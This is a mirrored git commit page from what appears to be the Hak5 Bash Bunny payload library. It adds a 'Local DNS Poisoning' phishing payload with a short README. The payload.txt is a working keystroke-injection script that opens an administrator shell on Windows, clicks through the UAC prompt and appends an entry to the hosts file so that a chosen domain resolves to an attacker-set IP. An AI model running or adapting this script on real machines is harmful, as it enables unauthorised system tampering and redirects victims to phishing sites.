mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
Added Simple Hosts DNS Spoofing payload (#223)
* Local hosts DNS spoofing attack This is a simple hosts DNS spoofin attack, where the target gets redirected to a set IP when going to a certain website. * Create README.md * Update README.md
This commit is contained in:
parent
691f7e5bc9
commit
6a9134d84b
9
payloads/library/phishing/Local_DNS_Poisoning/README.md
Normal file
9
payloads/library/phishing/Local_DNS_Poisoning/README.md
Normal file
@ -0,0 +1,9 @@
|
||||
# Hosts DNS Spoofer
|
||||
|
||||
## Description
|
||||
|
||||
Redirects a domain to a set IP adres by changing the hosts file. The UAC bypass is done so it works on windows 10.
|
||||
|
||||
## Configuration
|
||||
|
||||
Change the domain you want to redirect and the IP you want to direct it to.
|
||||
29
payloads/library/phishing/Local_DNS_Poisoning/payload.txt
Normal file
29
payloads/library/phishing/Local_DNS_Poisoning/payload.txt
Normal file
@ -0,0 +1,29 @@
|
||||
#Title: Local DNS Poisoning
|
||||
#Description: Attacks the host file to redirect a website of your chosing for a given domain
|
||||
#Author: DavidSpek
|
||||
#Props: ashbreeze96 and overwraith
|
||||
#Target: Windows (Including 10 latest build)
|
||||
|
||||
|
||||
LED R 200
|
||||
|
||||
ATTACKMODE HID
|
||||
LED STAGE1
|
||||
Q GUI x
|
||||
Q DELAY 50
|
||||
Q A
|
||||
Q DELAY 500
|
||||
Q LEFTARROW
|
||||
Q DELAY 50
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING set file="%windir%\System32\drivers\etc\hosts"
|
||||
Q DELAY 50
|
||||
Q ENTER
|
||||
Q STRING 'echo 10.1.1.0 test.com>>%file%'
|
||||
Q DELAY 50
|
||||
Q ENTER
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
|
||||
LED FINISH
|
||||
Loading…
x
Reference in New Issue
Block a user